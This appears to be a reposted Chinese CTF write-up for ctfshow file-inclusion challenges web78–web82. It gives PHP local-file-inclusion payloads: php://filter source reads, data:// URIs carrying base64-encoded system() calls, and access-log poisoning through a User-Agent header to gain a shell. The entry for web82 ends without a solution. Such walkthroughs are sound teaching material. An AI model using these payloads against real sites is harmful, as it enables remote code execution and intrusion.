当前位置：网站首页>ctfshow 文件包含

ctfshow 文件包含

2022-07-30 23:17:00 【白塔河冲浪手】

web78

进入环境

直接利用php://filter伪协议读取flag.php文件

?file=php://filter/read=convert.base64-encode/resource=flag.php

base64解码得到flag

web79

 <?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

str_replace替换字符串

将变量file中的php替换成???

那我们这里就不能用php伪协议了换data协议并用base64加密

?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOyA/Pg==

?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=
<?php system('cat flag.php'); ?>

web80

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

同上过滤php,data

正常服务器中的日志文件位置：

/var/log/nginx/access.log
/var/log/apache2/access.log

这里包含日志文件来getshell

可以看见日志文件会记录User-Agent

抓包修改User-Agent

<?php system('ls');?>

<?php system('cat fl0g.php');?>

web81

 <?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

同上过滤php,data,:

使用日志文件getshell

和上题一样

web82

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}
?>

.也过滤了日志包含不行

原网站

版权声明
本文为[白塔河冲浪手]所创，转载请带上原文链接，感谢
https://blog.csdn.net/m0_63253040/article/details/126046116